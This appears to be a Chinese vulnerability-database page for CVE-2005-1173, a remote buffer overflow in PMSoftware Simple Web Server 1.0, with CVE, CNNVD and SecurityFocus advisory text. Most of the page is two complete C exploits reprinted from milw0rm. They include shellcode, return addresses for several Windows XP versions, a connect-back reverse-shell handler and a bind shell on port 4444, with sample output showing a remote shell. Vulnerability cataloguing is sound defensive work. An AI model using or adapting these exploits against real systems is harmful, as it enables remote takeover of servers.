CVE-2005-1173
CVSS7.5
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:17:52
NMCOES    

[原文]Buffer overflow in PMSoftware Simple Web Server 1.0 allows remote attackers to execute arbitrary code via a long GET request.


[CNNVD]PMSoftware Simple Web Server远程缓冲区溢出漏洞(CNNVD-200505-175)

        PMSoftware Simple Web Server 1.0存在缓冲区溢出,远程攻击者可以通过长的GET请求来执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1173
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1173
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-175
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=111384806002021&w=2
(UNKNOWN)  BUGTRAQ  20050418 ERNW Security Advisory 01/2005

- 漏洞信息

PMSoftware Simple Web Server远程缓冲区溢出漏洞
高危 缓冲区溢出
2005-05-02 00:00:00 2005-10-20 00:00:00
远程  
        PMSoftware Simple Web Server 1.0存在缓冲区溢出,远程攻击者可以通过长的GET请求来执行任意代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (945)

PMSoftware Simple Web Server (GET Request) Remote BoF Exploit (EDBID:945)
windows remote
2005-04-24 Verified
80 cybertronic
N/A [点击下载]
/*
 *
 * PMSoftware Simple Web Server Buffer Overflow Exploit
 * 3 targets
 *
 * cybertronic[at]gmx[dot]net
 * 04/25/2005
 *               __              __                   _
 *   _______  __/ /_  ___  _____/ /__________  ____  (_)____
 *  / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
 * / /__/ /_/ / /_/ /  __/ /  / /_/ /  / /_/ / / / / / /__
 * \___/\__, /_.___/\___/_/   \__/_/   \____/_/ /_/_/\___/
 *     /____/
 *
 * --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
 * Usage: ./PMSoftwareSimpleWebServer_expl -h <tip> -p <tport> -l <cbip> -c <cbport> -t <target>
 *         0 WinXP Home SP1 GER [0x71a17bfb] [pad=213] [offset=222]
 *         1 WinXP Prof SP1 GER [0x71a17bfb] [pad=216] [offset=225]
 *         2 WinXP Prof SP2 GER [0x71a19372] [pad=215] [offset=224]
 *
 * [ cybertronic @ PM ] $ ./PMSoftwareSimpleWebServer_expl -h 192.168.2.103 -p 80 -l 192.168.2.102 -c 1337 -t 1
 *
 * --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
 * --[ connecting to 192.168.2.103:80...done!
 * --[ exploiting WinXP Pro SP1 GER
 * --[ ret: 0x71a17bfb [ jmp esp in ws2_32.dll ]
 * --[ sending GET request [ 543 bytes ]...done!
 * --[ starting reverse handler [port: 1337]...done!
 * --[ incomming connection from:  192.168.2.103
 * --[ b0x pwned - h4ve phun
 * Microsoft Windows XP [Version 5.1.2600]
 * (C) Copyright 1985-2001 Microsoft Corp.
 *
 * C:\PMSoftware>
 *
 */


#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>

#define PORT 80

#define RED		"\E[31m\E[1m"
#define GREEN	"\E[32m\E[1m"
#define YELLOW	"\E[33m\E[1m"
#define BLUE	"\E[34m\E[1m"
#define NORMAL	"\E[m"

/*
 *
 * prototypes
 *
 */

int connect_to_remote_host ( char* tip, unsigned short tport );
int exploit ( int s, unsigned long xoredip, unsigned short xoredcbport, int targ );
int shell ( int s, char* tip, unsigned short cbport );

void header ();
void start_reverse_handler ( unsigned short cbport );
void usage ( char* name );

/*********************
* Windows Shellcode *
*********************/

/*
 * Type : connect back shellcode
 * Length: 316 bytes
 * CBIP : reverseshell[111] ( ^ 0x99999999 )
 * CBPort: reverseshell[118] ( ^ 0x9999 )
 *
 */

unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";

/*
 *
 * structures
 *
 */

typedef struct _args {
	char* tip;
	char* lip;
    int tport;
	int lport;
	int target;
} args;

struct targets {
	int  num;
	char name[64];
	unsigned long ret;
	int padding;
	int offset;
}
target[]= {
	{ 0, "WinXP Home SP1 GER", 0x71a17bfb, 213, 222 },
	{ 1, "WinXP Prof SP1 GER", 0x71a17bfb, 216, 225 },
	{ 2, "WinXP Prof SP2 GER", 0x71a19372, 215, 224 } //works only in conjunction with SoftIce :: stack guard is disabled somehow
};

/*
 *
 * functions
 *
 */

int
connect_to_remote_host ( char* tip, unsigned short tport )
{
	int s;
	struct sockaddr_in remote_addr;
	struct hostent *host_addr;

    memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
    if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
	{
		printf ( "cannot resolve \"%s\"\n", tip );
		exit ( 1 );
	}
    remote_addr.sin_family = AF_INET;
    remote_addr.sin_port = htons ( tport );
    remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
    if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
    {
		printf ( "socket failed!\n" );
		exit ( 1 );
	}
	printf ( "--[ connecting to %s:%u...", tip, tport  );
	if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) ==  -1 )
	{
		printf ( "failed!\n" );
		exit ( 1 );
	}
	printf ( "done!\n" );
	return ( s );
}

int
exploit ( int s, unsigned long xoredip, unsigned short xoredcbport, int targ )
{
	char in[2048], request[1024];
	
	printf ( "--[ exploiting WinXP Pro SP1 GER\n" );
	printf ( "--[ ret: 0x%08x [ jmp esp in ws2_32.dll ]\n", target[targ].ret );
	
	memcpy ( &reverseshell[111], &xoredip, 4);
	memcpy ( &reverseshell[118], &xoredcbport, 2);
	
	bzero ( &request, sizeof ( request ) );
	request[0] = 0x47;
	request[1] = 0x45;
	request[2] = 0x54;
	request[3] = 0x20;
	request[4] = 0x2f;

	memset ( request + 5, 0x41, target[targ].padding );
	strncat ( request, ( unsigned char* ) &target[targ].ret, 4 );
	memcpy ( request + target[targ].offset, reverseshell, sizeof ( reverseshell ) - 1 );
	strcat ( request, "\r\n" );

	printf ( "--[ sending GET request [ %d bytes ]...", strlen ( request ) );
	if ( write ( s, request, strlen ( request ) ) <= 0 )
	{
		printf ( "failed!\n" );
		return ( 1 );
	}
	printf ( "done!\n" );
	return ( 0 );
}

int
send_head ( int s )
{
}

int
shell ( int s, char* tip, unsigned short cbport )
{
	int n;
	char buffer[2048];
	fd_set fd_read;

	printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "\n" );

	FD_ZERO ( &fd_read );
	FD_SET ( s, &fd_read );
	FD_SET ( 0, &fd_read );

	while ( 1 )
	{
		FD_SET ( s, &fd_read );
		FD_SET ( 0, &fd_read );

		if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
			break;
		if ( FD_ISSET ( s, &fd_read ) )
		{
			if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
			{
				printf ( "bye bye...\n" );
				return;
			}
			if ( write ( 1, buffer, n ) < 0 )
			{
				printf ( "bye bye...\n" );
				return;
			}
		}
		if ( FD_ISSET ( 0, &fd_read ) )
		{
			if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
			{
				printf ( "bye bye...\n" );
				return;
			}
			if ( send ( s, buffer, n, 0 ) < 0 )
			{
				printf ( "bye bye...\n" );
				return;
			}
		}
		usleep(10);
	}
}

void
header ()
{
	printf ( "              __              __                   _           \n" );
	printf ( "  _______  __/ /_  ___  _____/ /__________  ____  (_)____      \n" );
	printf ( " / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/  \n" );
	printf ( "/ /__/ /_/ / /_/ /  __/ /  / /_/ /  / /_/ / / / / / /__        \n" );
	printf ( "\\___/\\__, /_.___/\\___/_/   \\__/_/   \\____/_/ /_/_/\\___/  \n" );
	printf ( "    /____/                                                     \n\n" );
	printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\n" );
}

void
parse_arguments ( int argc, char* argv[], args* argp )
{
	int i = 0;
	
	while ( ( i = getopt ( argc, argv, "h:p:l:c:t:" ) ) != -1 )
	{
		switch ( i )
		{
			case 'h':
				argp->tip = optarg;
				break;
			case 'p':
				argp->tport = atoi ( optarg );
				break;
			case 'l':
				argp->lip = optarg;
				break;
			case 'c':
                argp->lport = atoi ( optarg );
	            break;
			case 't':
                argp->target = strtoul ( optarg, NULL, 16 );
	            break;
			case ':':
			case '?':
			default:
				usage ( argv[0] );
	    }
    }

    if ( argp->tip == NULL || argp->tport < 1 || argp->tport > 65535 || argp->lip == NULL || argp->lport < 1 || argp->lport > 65535 ||  argp->target < 0 || argp->target > 2 )
		usage ( argv[0] );
}

void
start_reverse_handler ( unsigned short cbport )
{
	int s1, s2;
	struct sockaddr_in cliaddr, servaddr;
	socklen_t clilen = sizeof ( cliaddr );
	
	bzero ( &servaddr, sizeof ( servaddr ) );
	servaddr.sin_family = AF_INET;
	servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
	servaddr.sin_port = htons ( cbport );

	printf ( "--[ starting reverse handler [port: %u]...", cbport );
	if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
	{
		printf ( "socket failed!\n" );
		exit ( 1 );
	}
	bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
	if ( listen ( s1, 1 ) == -1 )
	{
		printf ( "listen failed!\n" );
		exit ( 1 );
	}
	printf ( "done!\n" );
	if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
	{
		printf ( "accept failed!\n" );
		exit ( 1 );
	}
	close ( s1 );
	printf ( "--[ incomming connection from:\t%s\n", inet_ntoa ( cliaddr.sin_addr ) );
	shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );
	close ( s2 );
}

void
usage ( char* name )
{
	int i;

	printf ( "Usage: %s -h <tip> -p <tport> -l <cbip> -c <lport> -t <target>\n", name );
	for ( i = 0; i < 3; i++ )
		printf ( "\t%d %s [0x%08x] [pad=%d] [offset=%d]\n", target[i].num, target[i].name, target[i].ret, target[i].padding, target[i].offset );
    exit ( 1 );
}

int
main ( int argc, char* argv[] )
{
	int s, targ, i;
	unsigned long xoredip;
	unsigned short cbport, xoredcbport;
	struct sockaddr_in remote_addr;
	struct hostent *host_addr;
	args myargs;

	system ( "clear" );
	header ();
	parse_arguments ( argc, argv, &myargs );
	s = connect_to_remote_host ( myargs.tip, myargs.tport );
	
	xoredip = inet_addr ( myargs.lip ) ^ ( unsigned long ) 0x99999999;
	xoredcbport = htons ( myargs.lport ) ^ ( unsigned short ) 0x9999;

	if ( exploit ( s, xoredip, xoredcbport, myargs.target ) == 1 )
	{
		printf ( "exploitation FAILED!\n" );
		exit ( 1 );
	}
	start_reverse_handler ( myargs.lport );
}


// milw0rm.com [2005-04-24]
		

- 漏洞信息 (949)

PMsoftware Simple Web Server 1.0 Remote Stack Overflow Exploit (EDBID:949)
windows remote
2005-04-20 Verified
80 c0d3r
N/A [点击下载]
/*   
     PMsoftware mini http server remote stack overflow exploit
     author : c0d3r "kaveh razavi" c0d3rz_team@yahoo.com c0d3r@ihsteam.com 
	 package : PMsoftware Web Server version 1.0
	 advisory : http://www.securiteam.com/windowsntfocus/5TP0B2KFGA.html
	 company address : www.pmx.it
	 timeline :
	 17 Feb 2005 : bug found by ERNW Security
     18 Apr 2005 : Public Disclosure 
     18 Apr 2005 : crash exploit released (ERNW Security)
	 20 Apr 2005 : IHS exploit released , winxpsp1 & winxpsp2 target
	 compiled with visual c++ 6 : cl pm.c 
	 greetz : IHSTeam members,exploit-dev mates, securiteam , str0ke-milw0rm
	 ihsteam.com (persian) www.ihssecurity.com (english , just started)
     a big F*u to those who were/are/will trading konkoor questions-answers
	 (c) IHS security 2005
/*
/*
D:\projects>pm.exe 127.0.0.1 80 0

-------- PMSoftware web server remote overflow exploit by c0d3r

[+] building overflow string
[+] attacking host 127.0.0.1
[+] packet size = 680 byte
[+] connected
[+] sending the overflow string
[+] exploit sent successfully try telnet 127.0.0.1 4444

D:\projects>nc -vv 127.0.0.1 4444
DNS fwd/rev mismatch: localhost != kaveh
localhost [127.0.0.1] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\PMSoftware>DONE !
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define NOP 0x90
#define size 680

// 5 byte GET + 241 byte NOP junk + 4 byte containing return address 
// + 30 byte NOP  + 399 byte shellcode          

// using metasploit great shellcode LPORT=4444 Size=399 

unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";
  
  
  unsigned int rc,sock,os,addr ;
  struct sockaddr_in tcp;
  struct hostent *hp;
  WSADATA wsaData;
  char buffer[size];
  char jmp_esp[5];
  unsigned short port;
  char GET[] = "\x47\x45\x54\x20\x2F";
  char winxpsp1[] = "\xCC\x59\xFB\x77";
  char winxpsp2[] = "\xED\x1E\x94\x7C"; // not tested
  
 int main (int argc, char *argv[]){
  
	
	 if(argc < 3) {
 printf("\n-------- PMSoftware web server remote overflow exploit by c0d3r\n");
 printf("-------- usage : pm.exe host port target\n");
 printf("-------- target 1 : windows xp service pack 1 : 0\n");
 printf("-------- target 2 : windows xp service pack 1 : 1\n");
 printf("-------- eg : pm.exe 127.0.0.1 80 0\n\n");	
 exit(-1) ;
  } 
  printf("\n-------- PMSoftware web server remote overflow exploit by c0d3r\n\n");
 os = (unsigned short)atoi(argv[3]); 	 
  switch(os)
  {
   case 0:
    strcat(jmp_esp,winxpsp1);
    break;
   case 1:
    strcat(jmp_esp,winxpsp2); // wasnt checked
    break;
   default:
    printf("\n[-] this target doesnt exist in the list\n\n");
   
    exit(-1);
  }  
	
    // Creating heart of exploit code
  printf("[+] building overflow string");
  
    memset(buffer,NOP,size);
    memcpy(buffer,GET,sizeof(GET)-1);
	memcpy(buffer+246,jmp_esp,sizeof(jmp_esp)-1);
    memcpy(buffer+275,shellcode,sizeof(shellcode)-1);
    buffer[size] = 0;
	
	// EO heart of exploit code 

  
			if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
   printf("[-] WSAStartup failed !\n");
   exit(-1);
  }
	hp = gethostbyname(argv[1]);
  if (!hp){
   addr = inet_addr(argv[1]);
  }
  if ((!hp)  && (addr == INADDR_NONE) ){
   printf("[-] unable to resolve %s\n",argv[1]);
   exit(-1);
  }
  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  if (!sock){ 
   printf("[-] socket() error...\n");
   exit(-1);
  }
	  if (hp != NULL)
   memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
  else
   tcp.sin_addr.s_addr = addr;

  if (hp)
   tcp.sin_family = hp->h_addrtype;
  else
  tcp.sin_family = AF_INET;
  port=atoi(argv[2]);
  tcp.sin_port=htons(port);
   
  
  printf("\n[+] attacking host %s\n" , argv[1]) ;
  
  Sleep(1000);
  
  printf("[+] packet size = %d byte\n" , sizeof(buffer));
  
  rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
  if(rc==0)
  {
    
     Sleep(1000) ;
	 printf("[+] connected\n") ;
     printf("[+] sending the overflow string\n") ;
	 send(sock,buffer,strlen(buffer),0);
	 printf("[+] exploit sent successfully try telnet %s 4444\n" , argv[1]);
  } 
  
  else {
      printf("[-] ouch! Server is not listening .... \n");
 }
  shutdown(sock,1);
  closesocket(sock);
  }
  // EO exploit code

// milw0rm.com [2005-04-20]
		

- 漏洞信息

15667
Simple Web Server (SWS) GET Request Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in Simple Web Server. The application fails to perform proper bounds checking resulting in a buffer overflow. With an overly long GET request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-04-18 2005-02-17
2005-04-18 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

PMSoftware Simple Web Server Remote Buffer Overflow Vulnerability
Boundary Condition Error 13227
Yes No
2005-04-18 12:00:00 2009-07-12 02:06:00
Michael Thumann <mthumann@ernw.de> is credited with the discovery of this issue.

- 受影响的程序版本

PMSoftware Simple Web Server 1.0

- 漏洞讨论

A remote buffer overflow vulnerability affects PMSoftware Simple Web Server. This issue is due to a failure of the application to properly validate the length of user-supplied strings prior to copying them into static process buffers.

An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation.

- 漏洞利用

The following exploits have been provided:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站